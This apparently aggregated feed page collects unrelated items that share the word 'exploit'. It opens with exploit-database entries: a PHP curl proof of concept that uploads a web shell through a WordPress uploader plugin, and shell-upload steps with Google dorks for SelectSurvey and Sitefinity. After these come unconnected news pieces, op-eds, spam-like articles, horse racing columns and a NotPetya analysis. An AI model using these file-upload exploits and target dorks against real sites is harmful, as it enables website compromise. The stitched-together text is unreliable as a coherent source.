1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Wordpress Plugins - Uploader Arbitrary File Upload Vulnerability
# Version : 1.0.4
# Link : http://wordpress.org/extend/plugins/uploader/
# Plugins : http://downloads.wordpress.org/plugin/uploader.1.0.4.zip
# Date : 28-12-2012
# Google Dork : inurl:/wp-content/plugins/uploader/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/uploader/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile",
        'folder'=>"/wordpress/wp-content/uploads",
    'fileext'=>'php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://localhost/wordpress/wp-content/uploads/lo.php

lo.php
<?php
phpinfo();
?>

# Site : 1337day.com Inj3ct0r Exploit Database

          selectsurvey (file upload , asp)   

exploit : /survey/UploadImagePopup.aspx

find shell : /UploadedImages/Shell.asp

dork : "selectsurvey.netv4"

          Sitefinity CMS (ASP.NET)   

=============================================================
Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
=============================================================

###################################################
#
# Exploit Title: Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
# DDate: 16/11/2010
# Author: Net.Edit0r
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2 2.0)
# dork : "Sitefinity: Login"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
#
####################################################

    exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/

       then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

     select # asp renamed via the .asp;.jpg (shell.asp;.jpg)

  Upload to # http://site.com/Images/[shell]
          Al-Qaeda Said to Use Regional Strife to Tighten Grip in Pakistan   
Al-Qaeda has exploited recent political turmoil in Pakistan to strengthen its foothold along the country's border with Afghanistan, a top U.S. counterterrorism official said yesterday in an assessment that also warned of a heightened risk of attack during the upcoming U.S. election season.

          Parents and children vegans   

"Veganism is a philosophy of life that excludes all forms of exploitation and cruelty to the animal kingdom, and includes a reverence for life. Applies in practice following a pure vegetarian diet and encourages the use of alternatives for all matters arising part or all of animals. " Donald Watson, a founding member of the Vegan Society (Vegan Society)

And this is the documentary to my question. personally. struck me:


          Putin Accuses "Foreign Spy Agencies" Of Supporting Terrorism To Destabilize Russia   
Putin Accuses Foreign Spy Agencies Of Supporting Terrorism To Destabilize Russia In the first public accusation that "foreign spy agencies" are seeking to destabilize Russia made in recent years, during a meeting with Russia's foreign intelligence agency President Vladimir Putin said that "some foreign special services" are directly supporting extremist and terrorist groups to destabilize the situation near Russia’s borders, President Vladimir Putin said at a meeting with Russia’s foreign intelligence agency.

“In general, the growing activity of foreign special services against us and our allies is obvious,” Putin said quoted by Bloomberg during the televised speech in Moscow on Wednesday, without specifying which nations he was referring to. *“There are operations to influence the domestic political and social processes in our country.*”

Tangentially, the AP reported that according to an unclassified report by the Pentagon's Defense Intelligence Agency, released on Wednesday, *Kremlin leaders are convinced America is intent on regime change in Russia, *"a fear that is feeding rising tension and military competition between the former Cold War foes."

"The Kremlin is convinced the United States is laying the groundwork for regime change in Russia, a conviction further reinforced by the events in Ukraine," the report says, referencing the claims by President Vladimir Putin's government that the U.S. engineered the popular uprising that ousted Ukraine's Russia-friendly president, Viktor Yanukovich, in 2014. Russia responded by annexing Ukraine's Crimea region and supporting pro-Russian separatists in eastern Ukraine.



Thursday's report, prepared long before Trump's election, reflects the Pentagon's view of the global security picture shifting after nearly two decades of heavy American focus on countering terrorism and fighting relatively small-scale wars across the Middle East. Russia, in particular, is now at the center of the national security debate in Congress, fed by political divisions over how to deal with Putin and whether his military buildup, perceived threats against NATO and alleged election interference call for a new U.S. approach.



According to the AP, the 116-page report portrays Russia as increasingly wary of the United States. It cites Moscow's "deep and abiding distrust of U.S. efforts to promote democracy around the world and what it perceives as a U.S. campaign to impose a single set of global values." One almost wonders why.



"Moscow worries that U.S. attempts to dictate a set of acceptable international norms threatens the foundations of Kremlin power by giving license for foreign meddling in Russia's internal affairs," the report says. Titled "Russia Military Power," it is the agency's first such unclassified assessment in more than two decades.



The report also discusses recent military developments, with a focus on the middle east.



It cites the example of Moscow's 2015 military intervention in Syria. The Kremlin cast the effort as designed to combat Islamic State fighters. Washington saw Moscow largely propping up Assad by providing air support for the Syrian army's offensive against opposition forces.

 

The report says the Syria intervention is intended also to eliminate jihadist elements that originated on the former Soviet Union's territory to prevent them from returning home and threatening Russia. In any case, the report credits the intervention for having "changed the entire dynamic of the conflict, bolstering the Assad regime and ensuring that no resolution to the conflict is possible without Moscow's agreement."

 

"Nevertheless, these actions also belie a deeply entrenched sense of insecurity regarding a United States that Moscow believes is intent on undermining Russia at home and abroad," the report says.



The report harkens to Cold War days when the intelligence agency published a series of "Soviet Military Power" studies that defined the contours of the superpower rivalry. Those reports ended with the 1991 demise of the Soviet Union. Now they return, DIA's director, Marine Lt. Gen. Vincent R. Stewart, says, with an eye on the future of U.S.-Russian relations.

"*Within the next decade, an even more confident and capable Russia could emerge," *Stewart wrote in a preface to the report. No new, global ideological struggle akin to the Cold War is forecast, but the report cautions that Moscow "intends to use its military to promote stability on its own terms."

Which is why the "deep state", the Military-Industrial Complex. the neo-cons or whatever one wants to call the permanently bellicose wing in control, will *never *allow Trump to pursue a detente with Putin. To be sure, while Trump's campaign rhetoric was widely seen as sympathetic to Russia, ties have not improved in his first six months of his presidency. In April, *Trump said U.S.-Russian relations "may be at an all-time low." *Trump is expected to meet Putin for the first time at an international summit in Germany next week.

Meanwhile, to perpetuate the anti-Russia witch hunt, on Wednesday Rep. Adam Smith, the House Armed Services Committee's top Democrat, issued a "national security manifesto" on Russia. *He and a group of lawmakers writing in Time magazine cited the threat of "Putinism," which they termed "a philosophy of dictatorship" that seeks to extinguish democratic ideals such as government transparency by exploiting "discontented facets of democratic polities worldwide.*"

Which, of course, is not to be confused with CIA-ism, which is a philosophy of suberting any government around the globe with promises of globalist, credit-card driven expansion, and if that fails, with outright threats (and actions) to overthrow the existing regime by supporting its closest adversaries, both domestic and foreign.

Taking McCarthyism to the next level, at a Senate intelligence committee hearing Wednesday, Sen. Mark Warner of Virginia, the panel's ranking Democrat, said Russia is becoming more brazen.

*"Russia's goal is to sow chaos and confusion - to fuel internal disagreements and to undermine democracies whenever possible, and to cast doubt on the democratic process wherever it exists," *Warner said.

In other words, Russia is becoming just like the US... One can see why the Deep State and Democrats are so terrified. Reported by Zero Hedge 16 minutes ago.
          Pizza Buffet in Montana Freemos of Missoula   
NFL quarterbacks are the glamour boys of football: because of their important position on the team, they often get most of the attention whether it is for good or bad. Many are as famous for their exploits off the field as they are for their great plays on the field. But, going on statistics alone, here are some stats about 2 of the greatest to ever play the game.





-- Joe Montana: San Francisco 49ers





Although he finished out his career in rather lackluster fashion with the Kansas City Chiefs, Joe Montana made history during his thirteen years in San Francisco. It's hard to believe now that he wasn't drafted until the third round when he came out of Notre Dame in 1979, but it's true. He went on to play in 192 NFL regular season games, threw for an amazing 40, 551 yards, and threw 273 touchdown passes.





He won the MVP award twice and went to the Pro Bowl eight times during his illustrious career. While in San Francisco, he led his team to four Superbowl victories, and his trademark was coming through in the clutch and under pressure, especially in post-season games. He is a god in San Francisco still, despite being followed by the impressive and successful Steve Young, and will always be one of the city's favorite adopted sons.





-- John Elway: Denver Broncos





Drafted out of Stanford in 1983 by the Baltimore Colts in the 1st round, Elway was immediately traded in a strategic move by the Colts which sent him to the Denver Broncos. One has to wonder how much the Colts later regretted that decision as they watched their former draftee's career unfold in the Mile High City.





Elway remained in Denver during his whole 16 year NFL career. He played in 234 regular season games, threw for a whopping 51,475 yards, and threw an even 300 touchdown passes. He was elected MVP once, and played in nine Pro Bowls. Although he only helped his team win 2 Super Bowls (as compared with Joe Montana's 4), he led them to the Big Dance an amazing 5 times. Since his retirement, Elway has remained close to the city that made him a star and loves him so much and owns a string of Colorado car dealerships.





-- Joe Montana, John Elway, and Dan Marino of the Miami Dolphins were three of the best quarterbacks the game has ever seen and they all played ball during the 1980's. It was apparently a very good decade for record-setting quarterbacks, and their feats will not easily be duplicated!


Want to find a whole lot of fantastic free sports trivia? Visit GuessForFree.Com (http://www.guessforfree.com). Art Gib is a freelance writer.

missoula pizza freemos: Missoula Pizza

missoula pizza freemos: Pizza by the slice Missoula

Article Source: www.articlesnatch.com


          Cyberspace, Terrorism and International Law   

Governments have long worried about terrorists using the Internet to launch cyberattacks, spread propaganda, recruit and radicalise individuals and raise funds. However, the Islamic State’s exploitation of social media has caused a crisis and generated questions about international law’s role in addressing terrorism in cyberspace.


          Labrador's bill to limit refugee resettlement clears House Judiciary on party-line vote    

Idaho Rep. Raul Labrador’s legislation to limit refugee resettlement cleared the House Judiciary Committee this morning on a 15-11 party-line vote, with all Republicans present supporting it and all Democrats opposing it. The bill was reported out to the full House with just one amendment, sponsored by Labrador, to delete one section that sought to limit when victims of violence in foreign countries could be considered refugees. Nearly a dozen other amendments proposed by Democrats on the panel were rejected along party lines. You can read my full story here at spokesman.com.

Labrador said in a statement, “I am very pleased the committee approved my bill today. As Americans, we have a long tradition of helping refugees who, through no fault of their own, are fleeing war and persecution and wish to become contributing members of our society.  However, our first priority when it comes to America’s refugee program is ensuring the safety and security of the American people. There are already documented cases of terrorists infiltrating the program, and with ISIS vowing to exploit it further, the time for congressional action is now.”

The bill would reduce the maximum number of refugees resettled in the United States from 110,000 to 50,000 a year, a change sought by President Trump; give states and local governments veto power over any refugee resettlement within their borders; step up security monitoring of resettled refugees until they qualify as permanent residents; and require a review of all prospective refugees’ social media postings, among other provisions.

Rep. Pramila Jayapal, D-Wash., called the bill “an un-American assault on our country’s bipartisan humanitarian record of welcoming those who are fleeing violence.” She said right now, one person is being displaced every 3 seconds in the world, and said, “We are going to meet the 50,000 cap next week, at a time when there is such turmoil in the world and such a need to welcome refugees.”

Labrador’s bill is co-sponsored by Rep. Bob Goodlatte, R-Va., the chairman of the House Judiciary Committee; it also has drawn eight other GOP co-sponsors. Labrador introduced a similar bill last year, setting the maximum number of refugees at 60,000 a year. It drew 25 co-sponsors, all Republicans, and passed the Judiciary Committee last March, but didn’t proceed beyond that.

Democratic members of the House Judiciary Committee criticized the bill as mean-spirited and lacking in compassion, but none of their proposed amendments were approved. When Jayapal proposed an amendment she said would protect victims of sex trafficking and forced prostitution from being rejected for refugee status due to having committed crimes, Labrador told her he was willing to work with her on that issue, but not to accept her amendment, which he said would go beyond just those victims.

“I oppose the amendment, but I would invite the gentle lady to work with us to see if there’s some language that we can do what you said in your words, which is not what the amendment does,” Labrador told her. “What you said in your words is that you’re trying to protect victims of forced prostitution. And I think we can agree that maybe that’s something we can do. But if you read the language of your amendment, it is much broader than that. … It protects people from any crime they have committed, not just forced prostitution.”

At Goodlatte’s request, Jayapal withdrew her proposed amendment.

The one approved amendment deletes Section 13 of the bill, according to Labrador’s office, because Labrador decided that issue could be addressed in other legislation. Here is the deleted section:

SEC. 13. LIMITATION ON QUALIFICATION AS A REFUGEE.

Section 101(a)(42) of the Immigration and Nationality Act (8 U.S.C. 1101(a)(42)) is amended by inserting “For purposes of this paragraph, a person may not be considered a refugee solely or in part because the person is displaced due to, or is fleeing from, violence in the country of such person's nationality or, in the case of a person having no nationality, the country in which such person last habitually resided, if that violence is not specifically directed at the person, or, if it is directed specifically at the person, it is not directed at the person on account of that person’s race, religion, nationality, membership in a particular social group, or political opinion.” before “The term ‘refugee’ does not include”.

The bill now can proceed to a vote in the full House, at the discretion of House GOP leaders.


          New Petya Ransomware Attack Moving Laterally to Exploit Users   
Ransomware attack hits Ukraine the hardest, with impact on the U.S relatively muted, so far. Read the original post by Evan Selleck
          Upper Crust - By Evan Hammonds   

Leave it to the British to supply North America with its most compelling racing over the last week. One would think there would be enough graded stakes run in late June to satiate the racing public, but on June 24 there were but four graded races, including a pair in Southern California that gave us a four-horse field in the Affirmed Stakes (G3) and a five-horse field in the Precisionist Stakes (G3). The winners were 1-5 and 3-5,
respectively.

Sure, the Ohio Derby (G3) delivered a handful of horses from the Kentucky Derby Presented by Yum! Brands (G1), but there were no graded races east of JACK Thistledown Racino in North Randall, Ohio. With its stakes-packed Belmont Stakes (G1) day program and stakes-saturated Stars and Stripes day July 8 the three Saturdays from June 17 to July 1 at Belmont Park offer only the grade 3 Poker Stakes and the grade 2 Mother Goose Stakes.

While the U.S. schedule might have hit a dry patch, Royal Ascot filled the bill and then some during its five-day run June 20-24. We wrote in this space a year ago about Royal Ascot’s profile rising in the U.S. with each passing meet. The annual success of trainer Wesley Ward and last year’s exploits by champion Tepin and Lady Aurelia have been amped even further with NBC Sports deciding to cover Royal Ascot live on NBC Sports Network.

Ward was able to work his magic again, winning June 20 with Lady Aurelia in the group 1 King’s Stand Stakes and with Hat Creek Racing’s 3-year-old Scat Daddy filly Con Te Partiro. Making the presentation to Hat Creek’s Gatewood Bell at Ascot was Jon Miller, president of programming for NBC Sports.

It was Miller’s vision for NBC to broadcast from Royal Ascot. For its initial outing the division just wanted to get its feet wet, but it looks like NBC pulled off a plum.

“This first year, we managed our expectations. I can’t tell you how many texts and emails I got saying, ‘wow, I had no idea,’ ‘this is great,’ and ‘I’m putting this on my calendar for next year,’ ” Miller said after returning home from England. “What you are going to find is more and more people in this country are going to want to go there.”

That’s something to the effect we said a year ago. NBC’s coverage figures to take that to another level.

“They loved the partnership,” said Miller. “Everyone from Juliet Slot (Ascot’s commercial director) and director of racing Nick Smith, to Johnny Weatherby, who is Her Majesty the Queen’s representative…we got great feedback. We had wonderful cooperation from the folks at ITV, who did the post-feed for us. We found they are unbelievably great people to work with, and we really enjoyed all of the interaction there.

“It’s very hard for American television viewers—and horse racing fans—to understand the enormity of Royal Ascot unless you are actually there and see it in person. The facility is one of the best sporting facilities I’ve ever been to. And that eclipses all of the tracks in this country and also all the new great stadiums and other venues that are out there. The way they treat the event, the spectators, the patrons as it were, is the closest thing to Augusta or Wimbledon.

“I would tell people if you are trying to equate it to a sporting event in this country, those are the two events that you could benchmark it to.”

This is not a one-off deal by NBC, as the network and Royal Ascot have inked a multi-year agreement.

“A lot of our people internally here were blown away by how great it looked on television,” Miller said. “We’ve got a road map on how we can get it out there so more people are aware of it. That is one of the things we do exceptionally well at NBC. We’ll focus on that going forward. I think we have a real winner here.

“My hope is this becomes a regular date on the calendar for NBC, and this becomes an NBC staple much like the Olympics, the Ryder Cup, and even the Kentucky Derby as well,” he concluded.

We hope so, too.


          Going Up - By Lenny Shulman   

For a variety of reasons Arthur Hancock III has long been one of our favorite people in the industry. Through 70-plus  years he has maintained a sharp eye for horses and a sly wit and ready laugh; he has the heart of an artist (and is, in fact, a talented songwriter and musician); and he believes there is more to the universe than meets the eye.

Hancock’s embrace of omens is more than just Southern storytelling, although he has entertained many with his interpretation of seemingly random events. So on the morning of June 10, Hancock paid close attention when he heard a loud WHOOOSH coming from outside his office at Stone Farm near Paris. With his two dogs barking up a storm, Hancock ventured outside, where he saw cows running through a field so fast they looked like horses. And just beyond them was a hot air balloon lifting up no more than 10 feet off the ground.

It was not lost on Hancock that later in the day his homebred Ascend would be running in the $1 million Woodford Reserve Manhattan Stakes (G1T) at Belmont Park, where Hancock once lived in a tackroom while working for trainer Eddie Neloy.

“He floated down the valley, and I got in the car to see if he was in trouble,” Hancock said of the balloonist.

He drove through the farm and met three members of the University of Kentucky engineering department as they landed in one of his fields, the same field in which Ascend had been raised as a foal until he was weaned.

“I took that as a pretty direct omen,” Hancock said.

Hancock drove back home, where two weeks earlier a rabbit had entered through a door cracked open for the dogs. An exhaustive subsequent search had turned up neither hide nor hare. Now, as Hancock approached his front door, the rabbit was sitting on the porch and continued eating some greens as Hancock walked right up to it. Thirty years earlier Hancock had exited his office one day to find a rabbit sitting just outside, similarly without a care in the world.

“That was right before Sunday Silence ran,” said Hancock, referencing the dual classic winner whose racetrack exploits and subsequent sale saved Hancock from bankruptcy. “Those are the only two times that ever happened. It was a spiritual thing.”

It was both spiritual and sound business when Hancock bought a handful of mares from the dispersal of his late friend Edward Evans in 2011. One of those purchases was Ghost Dancing, in foal to Candy Ride, for whom Hancock gave $220,000. A floating calcification, too near a joint to be removed, caused Hancock to keep the Candy Ride yearling rather than get pennies on the dollar for him at auction.

“Sometimes your bad luck is your good luck,” said Hancock, who named the horse Ascend.

He was slow to come around although he proved a useful allowance runner last year at 4. Ascend won the Henry S. Clark Stakes in his first stakes try to begin this season but was facing five grade/group 1 winners in the Manhattan.

Hancock decided not to travel to New York for the race. He had longtime clients in town to look at horses and also wanted to attend a show by The Wooks, a bluegrass band that includes his son Arthur on banjo. His wife, Staci, and daughters Alex and Lynn deputized for him at Belmont.

“The farm was well-represented,” Hancock said. “They didn’t need some old, bald-headed guy up there to say something to (trainer) Graham (Motion) about strategy and (mess) the whole thing up.”

In the middle of the card, a hot air balloon similar to the one Hancock had seen that morning landed on the infield behind the Belmont toteboard. Not concerned with omens, the betting public held Ascend at 27-1 in the Manhattan. Ascend tracked in mid-pack, made a four-wide move turning for home, and assumed command at the  sixteenth pole, holding off a slew of graded stakes winners to win by 1 1/4 lengths.

“It was so thrilling,” said Hancock. “I stood there at home nervous as hell; it was an emotional win. It’s not easy winning one of those.”

Even when everything aligns.

“Sometimes you see a sign when things are gonna happen good,” he said. “Maybe it’s coincidence, but I don’t believe there’s any such thing.”


          Time Loves A Hero - By Evan Hammonds   

Many first-year students at the University of Kentucky feel the hair rise on the back of their necks when they hear the words “freshman English.” Back in the day the class often separated the wheat from the chaff while offering a series of writing challenges from descriptive essays to argumentative papers. In the fall of 1978, I chose to write why Seattle Slew should be Horse of the Year over Affirmed. Both had won Triple Crowns, in 1977 and ’78 respectively, but when the two met head-to-head on Sept. 16, 1978, in the Marlboro Cup (G1), the 4-year-old Slew beat Affirmed on the square by three lengths.

Of course, my argument proved unsuccessful when the Eclipse Awards were announced a few months later, but I took my shot. I don’t recall the grade I received, but thank goodness my English professor wasn’t a handicapper; however, two of my economics professors could often be found at Keeneland on a spring or fall afternoon.

Slew’s exploits in the fall of ’78 were a postscript to his brilliant run to and through the 1977 Triple Crown. BloodHorse celebrates the 40th anniversary of the unbeaten Triple Crown winner’s campaign with the first-in-a-series look at his 3-year-old debut March 9 at Hialeah Park. Through a long-standing relationship with Seattle Slew’s co-owners Mickey and Karen Taylor, features editor Lenny Shulman is allowed to share with readers a certain insight into Slew’s racing history. His interviews with trainer Billy Turner fill in the splendid back story into the career of the horse rated as No. 9 on The Blood-Horse’s Top 100 Racehorses of the 20th Century (ahead of other late ’70s stars Spectacular Bid, No. 10; and Affirmed, No. 12).

Adding depth to the commentary are the colorful images of the late Tony Leonard. Leonard’s eye captured the sport like few others could in the 1970s—and beyond—and his images of Secretariat, Seattle Slew, and Affirmed preserve one of racing’s  “Golden Ages.”

BloodHorse has been fortunate to have published many of Leonard’s images throughout the years, and has worked out an arrangement with the owners of the Tony Leonard Collection to share the photographer’s images of Seattle Slew with readers this year.

Of course, Seattle Slew’s story didn’t end with his 2-year-old championship, winning the Triple Crown, or his championship season at 4. His triumphant return to Kentucky to stand at stud at Spendthrift, syndicated at a record $12 million, was heralded as “Seattle Slew” day in the state of Kentucky by Gov. Julian Carroll. His first crop of runners, just 30 foals, yielded four grade 1 winners and two champions. Dual classic winner Swale came from his second, and Slew’s stud fee reached a reported $800,000 in 1985.

Slew’s legacy, through his most famous son A.P. Indy, is found in a remarkable number of today’s pedigrees as the great-grandsire of Tapit, North America’s leading sire three times running. A.P. Indy’s sons Malibu Moon, Majestic Warrior, Jump Start, and Bernardini grace this year’s top 20 leading sires…Mineshaft is No. 21.

Time loves a hero, and this series on Seattle Slew comes at an ideal time with the ability to catch several audiences: those too young to have been around; those that were really too young to grasp the true importance of Slew—myself included; and those who were around during the glory days but may have forgotten his power, charisma, and presence.


          Thoughts on the NotPetya Ransomware Attack    

Worms, malicious computer programs that spread from computer to computer throughout the network—are perhaps the most devastating delivery mechanism for an electronic attack.  Able to spread throughout an entire institution (or even across the entire planet) in a matter of minutes, they represent the most effective way for a bad actor to deliver a malicious payload to as many computers as possible.  A worm can do its damage faster than humans can react.

The most recent ransomware attack, which spread across Europe, the United States, and Asia yesterday, represents a chilling evolution in the worm-as-weapon. This is the second ransomware attack in two months, following the WannaCry attack that spread across the globe in May. Beginning in Ukraine, this new worm shut down much of the Ukrainian government, the Danish shipping conglomerate Maersk, and others. And there is a significant possibility that this wasn’t an attempt for ransom but a sophisticated attack launched against Ukrainian interests.

The worm has sometimes been referred to as Petya, based on the ransomware module used in the attack, but is really best described as NotPetya, since the Petya ransomware is simply a small component of a larger attack. This is a very sophisticated worm, which doesn’t just use one mechanism for spreading, but combines three separate techniques.  The first, using NSA tools released by ShadowBrokers, is similar to how WannaCry operated.  But the other two mechanisms are more pernicious, leveraging Windows network administration and privileges to spread.  So if NotPetya found itself running in a privileged account on a typical workstation, it could rapidly spread to other machines in the infected network.  One observer reported that it could compromise 5000 machines in ten minutes.

Here’s how it works. Although self-spreading, NotPetya does not generally spread outside of a single corporate network: it pretty much only bridges networks when computers move between them.  So the attackers responsible used another clever way in.  Rather than hacking the target networks, the attackers compromised the update service of MeDoc, a Ukrainian program used for accounting and tax purposes, with tight integration into the Ukrainian business tax workflow.  (Imagine the business equivalent of Quicken/TurboTax in the U.S.)  Most businesses that have to pay Ukrainian taxes will be running a copy somewhere in their corporate network.  By replacing the normal update with an installer for the NotPetya worm, every time a copy of the MeDoc program checked for updates (a process that happens automatically) the computer would become infected with NotPetya.  After establishing this beachhead, NotPetya could then spread throughout a corporate network.

The leveraging of privileges and administration tools is devastating.  Even an institution which is 100 percent patched and running the latest Windows 10 operating system could become completely infected if NotPetya started running on the wrong computer.  We don’t know which fraction of infections were due to a failure to patch and which fraction were due to the worm abusing privileges, but I would suspect the latter was actually more important for its rapid and effective spread.

This solid design suggests not just good development but good testing.  Building a worm is not hard per se: it’s simply a matter of coupling a remote exploit to a program that both searches for vulnerable systems and, after exploitation, copies itself onto the new victim. But it takes significant effort to make sure that a worm works reliably, especially on systems as diverse as Windows.  Unlike normal software development, the programmer can’t just simply run the program, find a bug, fix it, and repeat.  Worms need to be carefully tested in isolated networks, since even a poorly engineered worm leaves the attacker’s control if it gets loose on the Internet.  Given the difficulty in testing, doing a worm right also requires programmers who don’t write many bugs.

The problem is further magnified when testing a worm with a malicious payload.  NotPetya not only spreads using multiple mechanisms, but spreads reliably and apparently without major bugs.  It also contains an overtly malicious payload that renders unusable the host computer, in ten minutes to an hour, yet doesn’t generally impede the worm’s spread.  Killing the host is always a risk for a pathogen as a dead host can’t spread a plague further.  So a malicious payload like this needs to be tuned: fast enough to limit opportunities for human response, but slow enough that it doesn’t inhibit the spread.

This speaks to a rigorous development process.  If I had been in charge of building NotPetya, I’d budget for two to three good programmers, a month’s time, and a small but diverse isolated network for testing. I’d probably also need one additional person to keep rebuilding the isolated network after each test.  In other words, it wouldn’t be something I’d do in a basement.

Yet for all the sophistication, the ransomware payload is politely described as a fecal theater piece.  Ransomware needs a mechanism to contact the operator, but rather than using Tor hidden services, the authors used just a single email address that was quickly shut down, eliminating any way to contact the bad actors or obtain decryption keys.  If a high profile ransomware operator can’t release computers in return for payment, they will find that payments cease.  Ransomware works because the bad guys (try to) keep their word.

Ransomware also needs a payment mechanism that is hard to trace, such as a per-victim Bitcoin wallet, but NotPetya uses a single Bitcoin address.  So not only can we witness that they’ve only gained roughly ten thousand dollars, the nature of Bitcoin ensures that these miscreants will have a huge difficulty even getting their paltry earnings without being traced.

Ransomware also needs to resist a cryptanalysis attack attempting to unlock the encrypted files.  Yet NotPetya uses 800b RSA, a key length small enough that it is easily in the reach of NSA cryptanalysis and possibly within the reach of an enthusiastic private group as well.

Finally, ransomware needs a useable interface.  Good ransomware will unlock the victim’s computer at a click of a button after the attacker is satisfied.  In order to offer this functionality, the ransomware needs to keep the computer running while it encrypts the victim’s data.

But this particular ransomware can’t do that. When it infects a computer, it reboots the machine and then encrypts the files, rendering the computer completely unusable until the victim either reinstalls the computer or pays the ransom.  This would make it nearly impossible to pay the ransom in practice unless you have access to another computer: how do you contact the ransomware provider when your computer is completely unusable?  And payment is not easy, as it requires the user to copy out a complex string of characters, without error, and email it to the operator.  So even if the operator’s email account worked perfectly, odds are good the ransomware operator couldn’t unlock the victim’s computer.

Failed ransomware would be acceptable if this was new technology and new ransomware.  But the attackers integrated a range of tools, including the ShadowBrokers NSA toolkit, the mimikatz tool for extracting Windows authentication tokens, and the Petya ransomware, among other pieces.  They could have just as easily selected a much better ransomware payload, one that would actually ensure they could collect their money.

The only way the Petya payload is superior to other ransomware is that it does disable the computer.  If you wanted to deploy profitable ransomware to thousands of computers this is a horrid choice. On the other hand, if you want to deploy a payload that renders thousands of computers unusable but looks like ransomware, this is perhaps the best candidate possible. There is now additional evidence that suggests it was deliberately modified to render computers unusable rather than collect ransom.

This leaves us with two likely possibilities.  Either NotPetya was written by a group of criminals who showed great sophistication in their development process, wrote an excellent worm, and screwed up horribly on the one part that matters for the criminals to gain anything.  Or the worm was written by an actor who showed great sophistication in the development process, wrote an excellent worm, and used it to launch a malicious payload targeted at both the Ukrainian government and all businesses who pay Ukrainian taxes.

In many ways, this may even be a sequel to the CrashOverride power grid attack.  CrashOverride looked like the test of a payload.  NotPetya could easily be both an attack on the Ukrainian government and those doing business in the country and a live test of a delivery system.  If so, the worm’s incidental infection of non-Ukranian targets, notably Rosneft and other Russian targets, should act as a reminder that fast self-propagating code risks a huge amount of collateral damage.

At the moment, we don’t yet know whether the worm was developed as a criminal enterprise by hackers who failed to develop a working payment system or as an intentional attack on Ukraine disguised as criminal activity.  When all this is done, I think the NSA would be well served by making their own internal assessment of whoever is behind NotPetya public.  They don’t need to disclose sources and methods but simply the conclusion: “With X confidence, we believe NotPetya was authored by Y."  Either way, we would benefit from some attribution outside this guesswork and logic.

Even if it NotPetya does turn out to have been criminal activity, we should consider the lessons it can teach us when it comes to developing defenses. With a few changes, you could easily use NotPetya as the delivery mechanism for a worm designed to black out the U.S..  And given NotPetya’s abuse of administrative privileges, this attack could very well work against operators who are religious about patching their systems.

Experts have long worried about the potential impacts of high-speed worms, but the return of the worm to prominence, whether it is for criminals looking for profit or nation-states looking to test attacks, should give us pause.


          The President Gets His Groove Back   

Mitt Romney's closing act did not go so well this time around. Mitt was still Mitt, acting up, filibustering, and trying to score points with cheap shots. But this time around the President was determined not to let him get away with anything.
Obama had been roundly criticized after the first debate for letting his opponent “slide,” for not engaging him directly, for being too passive and allowing himself to be bullied by the more aggressive Romney. On this blog, I predicted that Romney was going to regret having won his first debate the way he did. [“Mitt's Pyrrhic Victory”] It was clear to me that this time Obama was not going to let Romney get away with what he said without question. Romney succeeded in bringing out the warrior in Obama. The President was nimble, quick and combative. Everything he wasn't in the first debate. What the public saw was their President standing up to a bully. But they also saw their President answering questions from ordinary citizens without evasion.
The President gets a very bad rap about his general demeanor. His calm, deliberative manner gets confused with weakness and Romney has been quick to exploit this perception. There are many people who don't really understand strength – they confuse strength with bombast, thinking that projecting strength is all about talking “tough.” But usually the opposite is true. Leaders who talk “tough” usually do it out of weakness, not strength. Typically, dictators are those who talk the toughest because they live in fear of their own people and need to act tough to intimidate their own populations. The Romney team has built up its whole argument against Obama based on the false premise that our President is weak, that he projects weakness around the world, even that he “leads from behind.” That narrative suffered somewhat when Romney was faced with a President who was not going to take a step back from the ever charging Romney, who at times seemed desperate and grasping at straws.
One of the seminal moments of the debate was when Romney, believing in his own propaganda, accused the President of not admitting that the attack on the Benghazi consulate was an act of terror. Obama corrected him and stated calmly that he had said that the very next day in the Rose Garden. Romney doubled down and acted like he had caught the President in a monstrous, lie only to be “fact-checked” on the spot by the rock steady moderator, Candy Crowley, a seasoned reporter from CNN. Obama, seizing the moment even quipped about Candy repeating her correction louder so everyone could hear. Before that, when Romney was committing himself to the proposition that the president was not telling the truth, Obama, sitting on his stool, simply smiled and said, “Please proceed, governor.” He was slyly encouraging Romney to hang himself and hang himself he did. Candy Crowley had the presence of mind to correct the record and the video below confirms the truth. It was at this precise moment that Romney's carefully constructed edifice started to crumble. All it takes is one truth teller to point out that the Emperor – in this case the governor – has no clothes.



It never ceases to amaze me in an age when everything is videotaped and it seems everything is available on places like You Tube that any politician would try to falsify a record so easily disproved. And then when caught in a blatant lie, supporters inevitably rally around their candidate and try to tell us that either the record is false or tampered with, or what you can see with your own eyes is not really true.
